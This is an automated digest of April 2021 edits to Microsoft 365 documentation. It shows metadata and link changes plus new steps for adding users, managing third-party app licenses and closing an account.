Updates from: 05/01/2021 03:09:46
Category Microsoft Docs article Related commit history on GitHub Change details
admin Add Users https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/add-users/add-users.md
localization_priority: Priority
- M365-subscription-management - Adm_O365_Setup-- Adm_O365_TOC - okr_smb - AdminSurgePortfolio-- manage_licenses search.appverid: - MET150 description: "Learn how to add users and assign licenses to Microsoft 365 at the same time."
The people on your team each need a user account before they can sign in and acc
You must be a global, license, or a user admin to add users and assign licenses. For more information, see [About admin roles](../../admin/add-users/about-admin-roles.md).
-## Watch: Add users in the admin center
+## Add a user in the admin simplified view
+
+If you're seeing this page in the admin center, you're on the **admin simplified view**. Follow the steps below to add a user.
++
+1. Go to the admin center at <https://admin.microsoft.com>.
+2. Select **Create an account for another person**.
+3. On the **Add a user account** page, fill in the first and last name, display name, and username they'll use to sign in.
+4. Add the email address of the user in the **Up to 5 email addresses...** text box. This will make sure the new user gets the information they need to sign into Microsoft 365 services.
+5. Select **Add user** and **Download sign-in info** if you want to save this info.
+
+## Watch: Add users in the dashboard view
> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE1FOfN?autoplay=false] > [!NOTE] > The steps used in the video show a different starting point for adding users, but the remaining steps are the same as the following procedure.
-## Add users one at a time
+## Add users one at a time in the dashboard view
::: moniker range="o365-worldwide"
-1. Go to the admin center at <a href="https://go.microsoft.com/fwlink/p/?linkid=2024339" target="_blank">https://admin.microsoft.com</a>.
+1. Go to the admin center at <https://admin.microsoft.com>.
+2. Go to **Users** > **Active users**, and select **Add a user**.
+3. In the **Set up the basics** pane, fill in the basic user information, and then select **Next**.
+ - **Name** Fill in the first and last name, display name, and username.
+ - **Domain** Choose the domain for the user's account. For example, if the user's username is Jakob, and the domain is contoso.com, they'll sign in by using jakob@contoso.com.
+ - **Password settings** Choose to use the autogenerated password or to create your own strong password for the user.
+ - The user must change their password after 90 days. Or you can choose to **Require this user to change their password when they first sign in**.
+ - Choose whether you want to send the password in email when the user is added.
+4. In the **Assign product licenses** pane, select the location and the appropriate license for the user. If you don't have any licenses available, you can still add a user and buy additional licenses. Expand **Apps** and select or deselect apps to limit the apps the user has a license for. Select **Next**.
+5. In the **Optional settings** pane, expand **Roles** to make this user an admin. Expand **Profile info** to add additional information about the user.
+6. Select **Next**, review your new user's settings, make any changes you like, then select **Finish adding**, then **Close**.
1. Go to the admin center at <a href="https://go.microsoft.com/fwlink/p/?linkid=848041" target="_blank">https://portal.office.de</a>.
admin Sign Up For Office 365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/admin-overview/sign-up-for-office-365.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_TOC - TRN_SMB - TRN_M365B - OKR_SMB_Videos - okr_SMB - AdminSurgePortfolio
+- commerce_signup
+- PPM_pablom
+ search.appverid: - MET150-- MOE150-- BEA160-- GEA150
-description: "Understand what you need to know before you go through the sign-up process for Office 365. "
+description: "Understand what you need to know before you go through the sign-up process for Office 365."
Last updated : 03/17/2021 # How to sign up - Admin Help
admin Change Address Contact And More https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/manage/change-address-contact-and-more.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_TOC-+
+- AdminSurgePortfolio
+- commcerce_billing
+- PPM_jmueller
+ search.appverid:-- BCS160 - MET150-- MOE150-- GEA150 description: "Learn how to make changes to your organization profile, such as organization name, address, phone, technical contact, and email." Last updated : 03/30/2021 # Change your organization's address, technical contact, and more
admin Self Service Sign Up https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/misc/self-service-sign-up.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_NonTOC - AdminSurgePortfolio - okr_SMB
+- commerce_signup
+- PPM_pablom
+ search.appverid: - MET150 description: "Learn about the Microsoft 365 self-service sign-up and available self-service programs such as Microsoft Power Apps, Microsoft Flow, and Dynamics 365 for Finance." Last updated : 03/17/2021 # Using self-service sign-up in your organization
The following example describes how self-sign up works for a school. The same pr
1. Students and faculty members have school email addresses that indicate they are associated with your institution. For example, the email address jakob@uw.edu may indicate a student at the University of Washington. 2. Students and faculty go to [our web site](https://go.microsoft.com/fwlink/p/?LinkId=536628), and use their email address to sign up for the services that your organization offers, such Microsoft 365 Apps for enterprise. They can also sign up for other free services that we offer. 3. We validate their email address, and then they can start using Microsoft 365, Power BI, or other services right away.
-4. As the business admin, you can see who has signed up for a subscription by selecting the subscription on the **Licensing** page in the Microsoft 365 admin center. This way you can see when there are new or unrecognized licenses for services in your tenant. To control whether users can sign up for self-service subscriptions, use the [Set-MsolCompanySettings](/powershell/module/msonline/set-msolcompanysettings?view=azureadps-1.0) PowerShell cmdlet with the **AllowAdHocSubscriptions** parameter. For more information, see [How do I control self-service settings?](/azure/active-directory/users-groups-roles/directory-self-service-signup#how-do-i-control-self-service-settings)
+4. As the business admin, you can see who has signed up for a subscription by selecting the subscription on the **Licensing** page in the Microsoft 365 admin center. This way you can see when there are new or unrecognized licenses for services in your tenant. To control whether users can sign up for self-service subscriptions, use the [Set-MsolCompanySettings](/powershell/module/msonline/set-msolcompanysettings?view=azureadps-1.0&preserve-view=true) PowerShell cmdlet with the **AllowAdHocSubscriptions** parameter. For more information, see [How do I control self-service settings?](/azure/active-directory/users-groups-roles/directory-self-service-signup#how-do-i-control-self-service-settings)
## Available self-service programs
admin Apply For A Fapiao https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/services-in-china/apply-for-a-fapiao.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_NonTOC-- commerce-+
+- AdminSurgePortfolio
+- commerce_billing
+- PPM_jmueller
+ search.appverid: - MET150 - GEA150 description: "Learn how to submit your Fapiao request to the 21Vianet Fapiao management system after making a payment in the Office 365 operated by 21Vianet in China." monikerRange: 'o365-21vianet' Last updated : 03/30/2021 # Apply for a Fapiao for Office 365 operated by 21Vianet
business Security Features https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/business/security-features.md
Advanced features in Microsoft 365 Business Premium are available to help you pr
Your Microsoft 365 Business Premium subscription includes features that help you maintain compliance and regulatory standards. -- **[Overview of data loss prevention policies](../compliance/data-loss-prevention-policies.md)** (DLP).
+- **[Learn about data loss prevention](../compliance/dlp-learn-about-dlp.md))** (DLP).
You can set up DLP to automatically detect sensitive information, like credit card numbers, social security numbers, and so on, to prevent their inadvertent sharing outside your company.
commerce About Registration Numbers https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/about-registration-numbers.md
- Adm_O365 search.appverid: - MET150
-description: "Learn about registration numbers and under-review notifications when you buy Microsoft products or services."
- okr_SMB - AdminSurgePortfolio-- commerce
+- commerce_purchase
+- PPM_jmueller
+
+description: "Learn about registration numbers and under-review notifications when you buy Microsoft products or services."
Last updated : 03/17/2021 # About registration numbers and under review notifications
commerce Add Storage Space https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/add-storage-space.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_TOC - SPO_Content - MAX_CampaignID - okr_SMB - AdminSurgePortfolio-- commerce
+- commerce_purchase
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn to add and reduce file storage in your Microsoft 365 subscription. With extra file storage, you can store more content in SharePoint Online and OneDrive." Previously updated : Last updated : 04/02/2021 # Add storage space for your subscription
commerce Change Payment Frequency https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/billing-and-payments/change-payment-frequency.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_TOC-- commerce - TopSMBIssues - okr_SMB - AdminSurgePortfolio
+- commerce_billing
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn how to change how frequently you're billed for your business subscription." Last updated : 04/02/2021 # Change your billing frequency
commerce Change Your Billing Addresses https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/billing-and-payments/change-your-billing-addresses.md
- okr_SMB - AdminSurgePortfolio-- commerce
+- commerce_billing
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn how to update your billing addresses for Microsoft 365 for business. You can also update the email address used to receive billing notifications."- Last updated : 04/07/2021 # Change your billing addresses
commerce Manage Payment Methods https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/billing-and-payments/manage-payment-methods.md
localization_priority: Priority
- M365-subscription-management - Adm_O365-- Adm_TOC - TopSMBIssues - okr_SMB - AdminSurgePortfolio-- commerce
+- commerce_billing
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn how to manage your payment methods in the Microsoft 365 admin center." Previously updated : Last updated : 04/02/2021 # Manage payment methods
commerce Mexico Billing Info https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/billing-and-payments/mexico-billing-info.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- commerce search.appverid: - MET150 description: "Learn about information specifically for Microsoft 365 for business in Mexico." - AdminSurgePortfolio-- Commerce
+- commerce_billing
+- PPM_jmueller
+ monikerRange: 'o365-worldwide' Last updated : 11/20/2020 # Billing information for Microsoft 365 for business in Mexico
commerce Buy Or Edit An Add On https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/buy-or-edit-an-add-on.md
- Adm_O365 search.appverid: - MET150
-description: "Learn how to buy and manage add-ons for your Microsoft 365 for business subscription."
- okr_SMB - AdminSurgePortfolio-- Commerce
+- commerce_purchase
+- PPM_jmueller
+
+description: "Learn how to buy and manage add-ons for your Microsoft 365 for business subscription."
Last updated : 04/02/2021 # Buy or manage add-ons
commerce Close Your Account https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/close-your-account.md
localization_priority: Normal -- commerce
+- M365-subscription-management
+- Adm_O365
- AdminSurgePortfolio - fwlink 2133922 to Delete subscription heading
+- commerce_subscription
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn how to close your account with Microsoft." Last updated : 04/02/2021 # Close your account
Delete all users except for one global administrator. The global administrator c
If users are synchronized from on-premises, first turn off sync, then delete the users in the cloud directory by using the Azure portal or Azure PowerShell cmdlets.
-To delete users, see <a href="/office365/admin/add-users/delete-a-user?view=o365-worldwide#user-management-admin-delete-one-or-more-users-from-office-365">User management admin: Delete one or more users</a>.
+To delete users, see [User management admin: Delete one or more users](../admin/add-users/delete-a-user.md#user-management-admin-delete-one-or-more-users-from-office-365).
-You can also use the <a href="https://docs.microsoft.com/powershell/module/msonline/remove-msoluser">Remove-MsolUser</a> PowerShell cmdlet to delete users in bulk.
+You can also use the [Remove-MsolUser](/powershell/module/msonline/remove-msoluser) PowerShell cmdlet to delete users in bulk.
-If your organization uses Active Directory that synchronizes with Microsoft Azure Active Directory (Azure AD), delete the user account from Active Directory, instead. For instructions, see <a href="/azure/active-directory/users-groups-roles/users-bulk-delete">Bulk delete users in Azure Active Directory</a>.
+If your organization uses Active Directory that synchronizes with Microsoft Azure Active Directory (Azure AD), delete the user account from Active Directory, instead. For instructions, see [Bulk delete users in Azure Active Directory](/azure/active-directory/users-groups-roles/users-bulk-delete).
## Step 2: Cancel all active subscriptions
If your organization uses Active Directory that synchronizes with Microsoft Azur
6. For each disabled subscription, repeat steps 3 through 5 until all subscriptions are deleted. > [!NOTE]
-> If you're unable to immediately delete a disabled subscription, <a href="/microsoft-365/Admin/contact-support-for-business-products" target="_blank">contact support</a>
+> If you're unable to immediately delete a disabled subscription, [contact support](../admin/contact-support-for-business-products.md).
## Step 4: Disable multi-factor authentication
If your organization uses Active Directory that synchronizes with Microsoft Azur
3. Choose **Multi-factor authentication**. 4. On the multi-factor authentication page, disable all accounts except for the global admin account that you're currently using.
-You can also <a href="/azure/active-directory/authentication/howto-mfa-userstates#change-state-using-powershell">use PowerShell to disable multi-factor authentication for multiple users</a>.
+You can also [use PowerShell to disable multi-factor authentication for multiple users](/azure/active-directory/authentication/howto-mfa-userstates#change-state-using-powershell).
+ ## Step 5: Delete the directory in Azure Active Directory
commerce Enter Your Product Key https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/enter-your-product-key.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- commerce-- Adm_NonTOC search.appverid: - MET150
-description: "Learn how to redeem a Microsoft 365 Business Standard product key purchased at a retail store."
- okr_SMB - AdminSurgePortfolio
+- commerce_purchase
+- PPM_jmueller
+
+description: "Learn how to redeem a Microsoft 365 Business Standard product key purchased at a retail store."
Last updated : 11/13/2020 # Enter your product key for Microsoft 365 Business Standard
commerce Manage Third Party App Licenses https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/licenses/manage-third-party-app-licenses.md
+
+ Title: "Manage third-party app licenses in the Microsoft 365 admin center"
+f1.keywords:
+- NOCSH
+++
+audience: Admin
++
+localization_priority: Normal
+
+- M365-subscription-management
+- Adm_O365
+
+- AdminSurgePortfolio
+- commerce_licensing
+
+search.appverid:
+- MET150
+description: "Learn how to manage licenses for third-party apps in the Microsoft 365 admin center."
++
+# Manage third-party app licenses in the Microsoft 365 admin center
+
+A third-party app is an app that you buy from a software vendor other than Microsoft.
+
+## Before you begin
+
+You must be a Global, License, or User admin to assign licenses. For more information, see [About admin roles](../../admin/add-users/about-admin-roles.md).
+
+## Assign third-party app licenses to users or groups
+
+1. In the Microsoft 365 admin center, go to the **Billing** > <a href="https://go.microsoft.com/fwlink/p/?linkid=842264" target="_blank">Licenses</a> page.
+2. Select the app that you want to assign licenses for.
+3. On the license details page, select **Assign licenses**.
+4. In the **Assign licenses** pane, begin typing the name of a user or group, and then choose it from the results to add it to the list.
+5. When you're finished, select **Assign**, then select **Close**.
+
+## Unassign third-party app licenses from users or groups
+
+1. In the admin center, **Billing** > <a href="https://go.microsoft.com/fwlink/p/?linkid=842264" target="_blank">Licenses</a> page.
+2. Select the app that you want to unassign licenses for.
+3. On the license details page, select the users and groups to remove licenses from, then select Unassign licenses.
+4. In the dialog box, confirm that you want to remove the licenses, then select Unassign.
+
+## Add or remove third-party app licenses for your account
+
+Third-party app licenses are managed by the app vendor. Contact the vendor to add or remove licenses for your account.
+
+## Next steps
+
+Depending on the third-party app that you bought, your next step might be to install the app into your organizationΓÇÖs environment. Installing the app makes it available for your users. Use the following steps to install a third-party app to your environment.
+
+1. In the admin center, **Billing** > <a href="https://go.microsoft.com/fwlink/p/?linkid=842264" target="_blank">Licenses</a> page.
+2. Select the app that you want to install into your account.
+3. On the license details page, select Install this product. You are redirected to a different platform site where you install the app into your environment.
+
+## Related content
+
+[Assign licenses to users](../../admin/manage/assign-licenses-to-users.md) (article) \
+[Unassign licenses from users](../../admin/manage/remove-licenses-from-users.md) (article)
commerce Manage Billing Accounts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/manage-billing-accounts.md
localization_priority: Normal -- commerce -
+- M365-subscription-management
+- Adm_O365
+
+- AdminSurgePortfolio
+- commerce_billing
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn about billing accounts and how to manage them." Last updated : 03/17/2021 # Manage billing accounts
commerce Manage Partners https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/manage-partners.md
localization_priority: Normal -- commerce-
+- M365-subscription-management
+- Adm_O365
+
+- AdminSurgePortfolio
+- commerce_subscriptions
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn how to work with Microsoft-certified solution providers (partners) to purchase and manage products and services for your organization or school." Last updated : 04/13/2021 # Manage partner relationships
commerce Purchases From Microsoft Open https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/purchases-from-microsoft-open.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_NonTOC-- commerce-+
+- AdminSurgePortfolio
+- commerce_purchase
+- PPM_jmueller
+ search.appverid:-- BCS160 - MET150-- MOE150-- BEA160 description: "Learn how to activate, renew, or add licenses to an Microsoft 365 for business subscription." Last updated : 10/21/2020 # Enter your product key purchased from Microsoft Open
commerce Back Up Data Before Switching Plans https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/subscriptions/back-up-data-before-switching-plans.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- commerce-- Adm_TOC-+
+- AdminSurgePortfolio
+- commerce_subscriptions
+- PPM_jmueller
+ search.appverid: - BCS160 - MET150 - MOE150 - BEA160 description: "Backup Outlook, OneDrive, Yammer, and SharePoint content before changing Microsoft 365 plans." Last updated : 03/17/2021 # Back up data before switching Microsoft 365 for business plans
commerce Cancel Your Subscription https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/subscriptions/cancel-your-subscription.md
localization_priority: Priority
- M365-subscription-management - Adm_O365-- Adm_TOC - AdminSurgePortfolio-- commerce
+- commerce_subscriptions
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn how to cancel your Microsoft 365 for business trial or paid subscription." Previously updated : Last updated : 04/08/2021 # Cancel your subscription
commerce Change Plans Manually https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/subscriptions/change-plans-manually.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- commerce-- Adm_NonTOC-+
+- AdminSurgePortfolio
+- commerce_subscriptions
+- PPM_jmueller
+ search.appverid:-- BCS160 - MET150-- MOE150-- BEA160 description: "Change subscriptions manually by buying a new subscription and ensuring that both the subscriptions are listed and active." Last updated : 03/17/2021 # Change plans manually
commerce Important Information E4 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/subscriptions/important-information-e4.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_NonTOC-- commerce-+
+- customer-email
+- commerce_subscriptions
+- PPM_jmueller
+ search.appverid: - MET150+ description: "Important information about upgrading or changing plans for customers with an Office 365 E4 subscription." Last updated 08/14/2020- # Important information for Office 365 E4 customers
commerce Manage Self Service Signup Subscriptions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/subscriptions/manage-self-service-signup-subscriptions.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- commerce-- Adm_NonTOC-+
+- AdminSurgePortfolio
+- commerce_subscriptions
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn how to manage free self-service sign-up subscriptions for your organization." Last updated : 03/17/2021 # Manage self-service sign-up subscriptions
compliance Apply Retention Labels Automatically https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/apply-retention-labels-automatically.md
Some settings can't be changed after the label or policy is created and saved, w
### Deleting retention labels
-You can delete retention labels that aren't currently included in any retention label policies, that aren't configured for event-based retention, or mark items as regulatory records. The ability to delete retention labels that mark items as records is currently rolling out in preview.
+You can delete retention labels that aren't currently included in any retention label policies, that aren't configured for event-based retention, or mark items as regulatory records.
For retention labels that you can delete, if they have been applied to items, the deletion fails and you see a link to content explorer to identify the labeled items.
compliance Classifier Learn About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/classifier-learn-about.md
This category of classification mechanisms include finding content by:
- Recognizing an item because it's a variation on a template [(document finger printing)](document-fingerprinting.md). - Using the presence of exact strings [(exact data match)](create-custom-sensitive-information-types-with-exact-data-match-based-classification.md).
-Sensitivity and retention labels can then be automatically applied to make the content available for use in [data loss prevention (DLP)](data-loss-prevention-policies.md) and [auto-apply polices for retention labels](apply-retention-labels-automatically.md).
+Sensitivity and retention labels can then be automatically applied to make the content available for use in [Learn about data loss prevention](dlp-learn-about-dlp.md)) and [auto-apply polices for retention labels](apply-retention-labels-automatically.md).
## Classifiers
You can help improve the accuracy of all custom classifiers and some pre-trained
## See also - [Retention labels](retention.md)-- [Data loss prevention (DLP)](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Sensitivity labels](sensitivity-labels.md) - [Sensitive information type entity definitions](sensitive-information-type-entity-definitions.md) - [Document finger printing](document-fingerprinting.md)
compliance Communication Compliance Feature Reference https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/communication-compliance-feature-reference.md
By default, the **Direction is** condition is displayed and can't be removed. Co
### Sensitive information types
-You have the option of including sensitive information types as part of your communication compliance policy. Sensitive information types are either pre-defined or custom data types that can help identify and protect credit card numbers, bank account numbers, passport numbers, and more. As part of [data loss prevention (DLP)](data-loss-prevention-policies.md), the sensitive information configuration can use patterns, character proximity, confidence levels, and even custom data types to help identify and flag content that may be sensitive. The default sensitive information types are:
+You have the option of including sensitive information types as part of your communication compliance policy. Sensitive information types are either pre-defined or custom data types that can help identify and protect credit card numbers, bank account numbers, passport numbers, and more. As part of [Learn about data loss prevention](dlp-learn-about-dlp.md), the sensitive information configuration can use patterns, character proximity, confidence levels, and even custom data types to help identify and flag content that may be sensitive. The default sensitive information types are:
- Financial - Medical and health
compliance Compliance Quick Tasks https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/compliance-quick-tasks.md
For step-by-step guidance to define custom sensitive information types, see [Cre
### Prevent data loss
-[Data loss prevention (DLP) policies](data-loss-prevention-policies.md) allow you to identify, monitor, and automatically protect sensitive information across your Microsoft 365 organization. Use DLP policies to identify sensitive items across Microsoft services, prevent the accidental sharing of sensitive items, and help users learn how to stay compliant without interrupting their workflow.
+[Data loss prevention (DLP) policies](dlp-learn-about-dlp.md) allow you to identify, monitor, and automatically protect sensitive information across your Microsoft 365 organization. Use DLP policies to identify sensitive items across Microsoft services, prevent the accidental sharing of sensitive items, and help users learn how to stay compliant without interrupting their workflow.
For step-by-step guidance to configure DLP policies, [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md). For data loss management licensing information, see [Microsoft 365 licensing guidance for security & compliance](/office365/servicedescriptions/microsoft-365-service-descriptions/microsoft-365-tenantlevel-services-licensing-guidance/microsoft-365-security-compliance-licensing-guidance#office-365-data-loss-prevention-for-exchange-online-sharepoint-online-and-onedrive-for-business).
compliance Create A Custom Sensitive Information Type In Scc Powershell https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/create-a-custom-sensitive-information-type-in-scc-powershell.md
You can copy this markup, save it as an XSD file, and use it to validate your ru
## More information -- [Overview of data loss prevention policies](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Sensitive information type entity definitions](sensitive-information-type-entity-definitions.md)
compliance Create A Dlp Policy From A Template https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/create-a-dlp-policy-from-a-template.md
In addition, you can turn off each rule individually by editing the policy and t
## More information -- [Overview of data loss prevention policies](data-loss-prevention-policies.md)
-
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Send notifications and show policy tips for DLP policies](use-notifications-and-policy-tips.md)
-
- [Create a DLP policy to protect documents with FCI or other properties](protect-documents-that-have-fci-or-other-properties.md)
-
- [What the DLP policy templates include](what-the-dlp-policy-templates-include.md)
-
- [Sensitive information type entity definitions](sensitive-information-type-entity-definitions.md)
-
-
compliance Create Apply Retention Labels https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/create-apply-retention-labels.md
Some settings can't be changed after the label or policy is created and saved, w
### Deleting retention labels
-You can delete retention labels that aren't currently included in any retention label policies, that aren't configured for event-based retention, or mark items as regulatory records. The ability to delete retention labels that mark items as records is currently rolling out in preview.
+You can delete retention labels that aren't currently included in any retention label policies, that aren't configured for event-based retention, or mark items as regulatory records.
For retention labels that you can delete, if they have been applied to items, the deletion fails and you see a link to content explorer to identify the labeled items.
compliance Create Custom Sensitive Information Types With Exact Data Match Based Classification https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/create-custom-sensitive-information-types-with-exact-data-match-based-classification.md
But what if you wanted a custom sensitive information type (SIT) that uses exact
![EDM-based classification](../media/EDMClassification.png)
-EDM-based classification enables you to create custom sensitive information types that refer to exact values in a database of sensitive information. The database can be refreshed daily, and contain up to 100 million rows of data. So as employees, patients, or clients come and go, and records change, your custom sensitive information types remain current and applicable. And, you can use EDM-based classification with policies, such as [data loss prevention policies](data-loss-prevention-policies.md) (DLP) or [Microsoft Cloud App Security file policies](/cloud-app-security/data-protection-policies).
+EDM-based classification enables you to create custom sensitive information types that refer to exact values in a database of sensitive information. The database can be refreshed daily, and contain up to 100 million rows of data. So as employees, patients, or clients come and go, and records change, your custom sensitive information types remain current and applicable. And, you can use EDM-based classification with policies, such as [data loss prevention policies](dlp-learn-about-dlp.md) or [Microsoft Cloud App Security file policies](/cloud-app-security/data-protection-policies).
> [!NOTE] > Microsoft 365 Information Protection supports in preview double byte character set languages for:
EDM sensitive information types for following scenarios are currently in develop
- [Sensitive information type-entity definitions](sensitive-information-type-entity-definitions.md) - [Learn about sensitive information types](sensitive-information-type-learn-about.md)-- [Overview of DLP policies](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Microsoft Cloud App Security](/cloud-app-security) - [New-DlpEdmSchema](/powershell/module/exchange/new-dlpedmschema) - [Modify Exact Data Match schema to use configurable match](sit-modify-edm-schema-configurable-match.md)
compliance Customize A Built In Sensitive Information Type https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/customize-a-built-in-sensitive-information-type.md
These are the definitions for the terms you encountered during this procedure.
## For more information - [Sensitive information type entity definitions](sensitive-information-type-entity-definitions.md)
-
- [Create a custom sensitive information type](create-a-custom-sensitive-information-type.md)
-
-- [Overview of data loss prevention policies](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
compliance Data Classification Activity Explorer https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/data-classification-activity-explorer.md
Activity explorer also gathers **DLP policy matches** events from Exchange Onlin
- copied to network share - accessed by unallowed app
-The value of understanding what actions are being taken with your sensitive labeled content is that you can see if the controls that you have already put into place, such as [data loss prevention policies](data-loss-prevention-policies.md) are effective or not. If not, or if you discover something unexpected, such as a large number of items that are labeled `highly confidential` and are downgraded `general`, you can manage your various policies and take new actions to restrict the undesired behavior.
+The value of understanding what actions are being taken with your sensitive labeled content is that you can see if the controls that you have already put into place, such as [data loss prevention](dlp-learn-about-dlp.md) are effective or not. If not, or if you discover something unexpected, such as a large number of items that are labeled `highly confidential` and are downgraded `general`, you can manage your various policies and take new actions to restrict the undesired behavior.
> [!NOTE] > Activity explorer doesn't currently monitor retention activities for Exchange Online.
compliance Data Classification Content Explorer https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/data-classification-content-explorer.md
Content explorer shows a current snapshot of the items that have a sensitivity l
### Sensitive information types
-A [DLP policy](data-loss-prevention-policies.md) can help protect sensitive information, which is defined as a **sensitive information type**. Microsoft 365 includes [definitions for many common sensitive information types](sensitive-information-type-entity-definitions.md) from across many different regions that are ready for you to use. For example, a credit card number, bank account numbers, national ID numbers, and Windows Live ID service numbers.
+A [DLP policy](dlp-learn-about-dlp.md) can help protect sensitive information, which is defined as a **sensitive information type**. Microsoft 365 includes [definitions for many common sensitive information types](sensitive-information-type-entity-definitions.md) from across many different regions that are ready for you to use. For example, a credit card number, bank account numbers, national ID numbers, and Windows Live ID service numbers.
> [!NOTE] > Content explorer doesn't currently scan for sensitive information types in Exchange Online.
You can search on:
- [Learn about sensitivity labels](sensitivity-labels.md) - [Learn about retention policies and retention labels](retention.md) - [Sensitive information type entity definitions.md](sensitive-information-type-entity-definitions.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
compliance Data Loss Prevention Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/data-loss-prevention-policies.md
Title: "Overview of data loss prevention"
+ Title: "Data Loss Prevention Reference"
# rename the md file to the above title f1.keywords: - CSH Previously updated : 07/12/2019 Last updated : audience: ITPro f1_keywords: - 'ms.o365.cc.DLPLandingPage'
-localization_priority: Priority
+localization_priority: low
- M365-security-compliance - SPO_Content
search.appverid:
- MET150 - seo-marvel-apr2020
-description: Learn how to identify, monitor, and automatically protect your organization's sensitive information across Office 365.
+description: data loss prevention reference material
-# Overview of data loss prevention
+# Data loss prevention reference
+
+> [!IMPORTANT]
+> This is reference topic is no longer the main resource for Microsoft 365 data loss prevention (DLP) information. The DLP content set is being updated and restructured. The topics covered in this article will be moving to new, updated articles. For more information about DLP, see [Learn about data loss prevention](dlp-learn-about-dlp.md).
+ <!-- this topic needs to be split into smaller, more coherent ones. It is confusing as it is. --> <!-- move this note to a more appropriate place, no topic should start with a note --> > [!NOTE] > Data loss prevention capabilities were recently added to Microsoft Teams chat and channel messages for users licensed for Office 365 Advanced Compliance, which is available as a standalone option and is included in Office 365 E5 and Microsoft 365 E5 Compliance. To learn more about licensing requirements, see [Microsoft 365 Tenant-Level Services Licensing Guidance](/office365/servicedescriptions/microsoft-365-service-descriptions/microsoft-365-tenantlevel-services-licensing-guidance).
-To comply with business standards and industry regulations, organizations must protect sensitive information and prevent its inadvertent disclosure. Sensitive information can include financial data or personally identifiable information (PII) such as credit card numbers, social security numbers, or health records. With a data loss prevention (DLP) policy in the Office 365 Security &amp; Compliance Center, you can identify, monitor, and automatically protect sensitive information across Office 365.
++
+<!-- MOVED TO LEARN ABOUT To comply with business standards and industry regulations, organizations must protect sensitive information and prevent its inadvertent disclosure. Sensitive information can include financial data or personally identifiable information (PII) such as credit card numbers, social security numbers, or health records. With a data loss prevention (DLP) policy in the Office 365 Security &amp; Compliance Center, you can identify, monitor, and automatically protect sensitive information across Office 365.
With a DLP policy, you can:
